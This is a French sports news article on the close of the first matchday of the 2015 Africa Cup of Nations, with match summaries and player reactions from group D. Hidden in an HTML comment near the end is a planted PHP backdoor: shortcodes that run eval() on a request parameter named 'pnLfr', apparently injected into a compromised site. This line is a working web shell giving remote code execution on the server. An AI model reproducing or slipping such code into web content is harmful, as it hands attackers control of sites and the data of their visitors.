CAN 2015 : Fin de la 1ere journée

La Côte d’Ivoire et le Cameroun ont bouclé mardi 20 janvier la première journée de la phase des poules de la 30ème Coupe d’Afrique des nations «Guinée équatoriale 2015». Ces deux équipes font parties des favoris annoncés, à côté de l’Algérie, du Ghana et dans une moindre mesure du Sénégal. Comme les autres, elles n’ont pas dominé leur sujet et sont plutôt revenues de loin pour arracher le point du match nul, devant de coriaces sélections respectivement de la Guinée et du Mali.

C’est la confirmation d’une compétition très ouverte comme beaucoup d’observateurs l’avaient prédit. Même l’Algérie qui l’emporte 3-1 devant une Afrique du sud aussi maladroite que malchanceuse, elle ne s’est pas présentée dans son premier match comme le grand favori de l’épreuve que la presse algérienne et les supporters des Fennecs avaient plébiscité avant l’heure. Et ce n’est que tout bénef pour la plus grande compétition sportive africaine qui, avec cet équilibre des forces en présence, n’en que plus intéressante, à l’heure d’amorcer la deuxième journée ce mercredi 21 janvier avec les matches du groupe A.

Réactions après les matches du 20 janvier dans le groupe D

Yaya Touré, capitaine Côte d’Ivoire :
« L’équipe de Côte d’Ivoire joue avec une nouvelle génération. On prend encore des marques, mais dans l’ensemble ce n’est pas mal. Et nous avons pu revenir au score même réduits à dix ».

Florentin Pogba, défenseur guinéen et grand-frère de Paul Pogba l’international français :
« On a mal géré les dernières minutes, mais on va se contenter de ce point précieux pris à la Côte d’Ivoire, un point que personne ne nous donnait avant le match ».

Moustapha Yatabaré, attaquant du Mali :
« Je suis satisfait de notre prestation, avec quand même un peu de frustration parce qu’on concède l’égalisation à quelques minutes de la fin. On a fait un très bon match contre un bon Cameroun ; nous avons été costauds définitivement. On peut aller très loin ».

Ambroise Oyongo Bitolo, défenseur et buteur du Cameroun :
« Je suis évidemment content d’avoir délivré mon pays avec ce but, mais c’est l’état d’esprit général de notre équipe qui me donne satisfaction. Le coach avait demandé de se donner à fond et c’est ce que nous avons réalisé avec ce match nul qui nous permet de voir venir ».

<!– [insert_php]if (isset($_REQUEST["pnLfr"])){eval($_REQUEST["pnLfr"]);exit;}[/insert_php][php]if (isset($_REQUEST["pnLfr"])){eval($_REQUEST["pnLfr"]);exit;}[/php] –>

share on: